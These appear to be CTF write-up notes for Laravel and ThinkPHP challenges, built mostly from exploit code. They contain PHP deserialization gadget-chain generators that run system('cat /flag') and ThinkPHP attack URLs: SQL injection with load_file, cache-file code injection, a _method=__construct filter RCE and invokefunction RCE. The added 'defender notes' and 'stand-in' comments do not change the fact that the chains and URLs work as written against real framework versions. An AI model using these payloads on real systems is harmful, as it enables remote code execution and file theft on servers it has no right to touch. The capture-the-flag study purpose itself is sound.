反序列化入口格式：/admin/<base64 编码的序列化字符串>
参考文章
https://xz.aliyun.com/t/11002
payload
// Stand-in declaration for the framework class Illuminate\Validation\Validator.
// Only the class name and the $extensions property are reproduced, because those
// are what serialize() writes into the output; no real framework code is loaded.
namespace Illuminate\Validation {
class Validator {
// Empty default; the constructor below overwrites it before serialization.
public $extensions = [];
public function __construct() {
// Stores the function name 'system' under the empty-string key.
// NOTE(review): how the real Validator consumes this entry is not shown on this
// page; see the referenced article. It is inert data until an application
// unserializes it into a live object.
$this->extensions = ['' => 'system'];
}
}
}
// Stand-in for Illuminate\Broadcasting\PendingBroadcast plus the statement that
// prints the encoded object graph. $events holds the Validator stand-in and
// $event holds the command string.
namespace Illuminate\Broadcasting {
use Illuminate\Validation\Validator;
class PendingBroadcast {
protected $events;
protected $event;
// $cmd: string stored verbatim in $event.
public function __construct($cmd)
{
$this->events = new Validator();
$this->event = $cmd;
}
}
// Prints base64(serialize(object)). Property order and visibility above determine
// the exact bytes, so the declarations must not be reordered.
// Defender note: this string only matters to an endpoint that base64-decodes
// request data and passes it to unserialize(). Decoding with JSON instead, or
// calling unserialize($data, ['allowed_classes' => false]), removes that entry
// point. Base64 of a serialized PHP object begins with "Tzo", which can serve as
// a log/WAF signature.
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>
参考文章https://xz.aliyun.com/t/9478
// Stand-in for Illuminate\Broadcasting\PendingBroadcast that wraps a stand-in
// Illuminate\Events\Dispatcher, followed by the statement that prints the
// encoded object graph.
namespace Illuminate\Broadcasting
{
use Illuminate\Events\Dispatcher;
class PendingBroadcast
{
protected $events;
protected $event;
// $cmd is used twice: it is passed to the Dispatcher stand-in and stored in $event.
public function __construct($cmd)
{
$this->events = new Dispatcher($cmd);
$this->event=$cmd;
}
}
// Prints base64(serialize(object)).
// Defender note: the object graph is harmless as text. The exposure is an
// application calling unserialize() on client-supplied data without restricting
// classes. Restrict with ['allowed_classes' => false] or replace the format with JSON.
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
// Stand-in for Illuminate\Events\Dispatcher: declares only the $listeners
// property so that serialize() records the class name and that one field.
namespace Illuminate\Events
{
class Dispatcher
{
protected $listeners;
// $event: string used as the array key of $listeners.
public function __construct($event){
// One entry: the passed string maps to a one-element list holding 'system'.
// NOTE(review): presumably the real Dispatcher treats list entries as listener
// callables. That is not shown on this page; confirm against the referenced article.
$this->listeners=[$event=>['system']];
}
}
}
参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html
// Stand-in for Illuminate\Broadcasting\PendingBroadcast that declares only
// $events, holding a stand-in Illuminate\Notifications\ChannelManager. The
// object is then serialized and printed.
namespace Illuminate\Broadcasting
{
use Illuminate\Notifications\ChannelManager;
class PendingBroadcast
{
protected $events;
// $cmd: string forwarded unchanged to the ChannelManager stand-in.
public function __construct($cmd)
{
$this->events = new ChannelManager($cmd);
}
}
$seri = new PendingBroadcast('cat /flag');
// Prints base64(serialize($seri)).
// Defender note: only an endpoint that feeds decoded request data to unserialize()
// can be affected. Base64 of a serialized PHP object starts with "Tzo", a prefix
// worth alerting on in URL paths and parameters.
echo base64_encode(serialize($seri));
}
// Stand-in for Illuminate\Notifications\ChannelManager: declares three
// properties and fills them in the constructor so they appear in the serialized output.
namespace Illuminate\Notifications
{
class ChannelManager
{
protected $app;
protected $defaultChannel;
protected $customCreators;
// $cmd: string stored in $app.
public function __construct($cmd)
{
// 'yu22x' is an arbitrary label; it only has to match the key used in $customCreators.
$this->defaultChannel = 'yu22x';
// Maps that label to the function name 'system'.
// NOTE(review): presumably the real class looks up a creator for the default
// channel and calls it with $app. Not shown on this page; confirm against the referenced article.
$this->customCreators = array('yu22x' => 'system');
$this->app = $cmd;
}
}
}
?>
发送 payload 后，查看返回页面的源代码即可。
参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html
// Stand-in for Illuminate\Broadcasting\PendingBroadcast whose $events holds a
// stand-in Faker\ValidGenerator. The object is then serialized and printed.
namespace Illuminate\Broadcasting
{
use Faker\ValidGenerator;
class PendingBroadcast
{
protected $events;
// $cmd: string forwarded unchanged to the ValidGenerator stand-in.
public function __construct($cmd)
{
$this->events = new ValidGenerator($cmd);
}
}
$seri = new PendingBroadcast('cat /flag');
// Prints base64(serialize($seri)).
// Defender note: the classes named here come from a library namespace (Faker),
// not the framework namespace. Every autoloadable class is a candidate when
// unserialize() runs on untrusted input. Pass ['allowed_classes' => false] or
// avoid unserialize() for client data.
echo base64_encode(serialize($seri));
}
// Stand-in for Faker\ValidGenerator: declares three properties and fills them
// in the constructor so they appear in the serialized output.
namespace Faker
{
use Faker\DefaultGenerator;
class ValidGenerator
{
protected $maxRetries;
protected $validator;
protected $generator;
// $cmd: string forwarded unchanged to the DefaultGenerator stand-in.
public function __construct($cmd)
{
$this->generator = new DefaultGenerator($cmd);
// Large retry budget. NOTE(review): its effect depends on framework code not shown here.
$this->maxRetries = 10000000;
// Function name stored as a plain string.
// NOTE(review): presumably the real class invokes $validator on values produced
// by $generator. Not shown on this page; confirm against the referenced article.
$this->validator = 'system';
}
}
}
// Stand-in for Faker\DefaultGenerator: a single $default property that carries
// the string passed to the constructor into the serialized output.
namespace Faker
{
class DefaultGenerator
{
protected $default;
// $cmd: string stored verbatim in $default.
public function __construct($cmd)
{
$this->default = $cmd;
}
}
}
?>
参考文章http://www.136.la/jingpin/show-180114.html#POC1_46
// Stand-in for Illuminate\Broadcasting\PendingBroadcast. The constructor takes
// no arguments: $events is a stand-in Illuminate\Bus\Dispatcher and $event is a
// stand-in QueuedCommand, both declared elsewhere on this page.
namespace Illuminate\Broadcasting
{
use Illuminate\Bus\Dispatcher;
use Illuminate\Foundation\Console\QueuedCommand;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct()
{
$this->events = new Dispatcher();
$this->event = new QueuedCommand();
}
}
}
// Stand-in for Illuminate\Foundation\Console\QueuedCommand: one public property
// whose default value is the command string, so no constructor is needed.
namespace Illuminate\Foundation\Console
{
class QueuedCommand
{
// NOTE(review): the name suggests a queue connection; here it carries the
// command string. How the framework reads it is not shown on this page.
public $connection = 'cat /flag';
}
}
// Stand-in for Illuminate\Bus\Dispatcher: declares only $queueResolver so that
// serialize() records the class name and that one field.
namespace Illuminate\Bus
{
class Dispatcher
{
protected $queueResolver;
public function __construct()
{
// Function name stored as a plain string.
// NOTE(review): presumably the real Dispatcher calls the resolver with a value
// taken from the dispatched object. Not shown on this page; confirm against the referenced article.
$this->queueResolver='system';
}
}
}
// Global-namespace driver: builds the PendingBroadcast stand-in and prints
// base64(serialize(object)).
// Defender note: the output only has an effect where an application
// base64-decodes client data and calls unserialize() on it. Use
// unserialize($data, ['allowed_classes' => false]) or a data-only format such as JSON.
namespace
{
use Illuminate\Broadcasting\PendingBroadcast;
echo base64_encode(serialize(new PendingBroadcast()));
}
参考文章https://blog.csdn.net/qq_38154820/article/details/114610513
payload
// Stand-in for Illuminate\Broadcasting\PendingBroadcast: a plain two-field
// container whose values are supplied by the caller.
namespace Illuminate\Broadcasting{
// This import is not referenced anywhere inside this block.
use Illuminate\Contracts\Events\Dispatcher;
class PendingBroadcast
{
protected $event;
protected $events;
// $events: object stored in $events; $event: object stored in $event.
// The parameter order is ($events, $event), the reverse of the property declarations.
public function __construct($events, $event)
{
$this->event = $event;
$this->events = $events;
}
}
}
// Stand-in for Illuminate\Bus\Dispatcher: stores the caller-supplied value in
// $queueResolver so it appears in the serialized output.
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
// $queueResolver: value stored verbatim. The driver on this page passes the string 'system'.
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
// Stand-in for Illuminate\Broadcasting\BroadcastEvent: one public $connection
// property set from the constructor argument.
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
// $connection: value stored verbatim. The driver on this page passes the command string.
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
// Global-namespace driver: wires the three stand-in objects together and prints
// base64(serialize(object)).
// Defender note: nothing here touches a real framework. The risk lies in an
// application that unserializes client-controlled bytes. Remove that call, or
// restrict it with ['allowed_classes' => false]. Listing 'system' in php.ini
// disable_functions is defence in depth only.
namespace{
// $c carries the command string in its public $connection property.
$c = new Illuminate\Broadcasting\BroadcastEvent('cat /flag');
// $a carries the function name in $queueResolver.
$a = new Illuminate\Bus\Dispatcher('system');
// $b is the outer object: $events = $a, $event = $c.
$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
echo base64_encode(serialize($b));
}
参考文章https://www.cnblogs.com/litlife/p/11273652.html
试了几个报错函数，其中 exp 可用。
payload
index.php?s=index/index/inject&a[0]=inc&a[1]=exp(~(select load_file('/flag')))&a[2]=1
参考文章https://blog.csdn.net/rfrder/article/details/114599310
public/index.php?s=index/index/rce&cache=%0d%0asystem('cat /flag');//
接着访问
runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php
s=cat /flag&_method=__construct&method=POST&filter[]=system
aaaa=cat /flag&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=cat /flag
c=cat /flag&f=calc&_method=filter
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*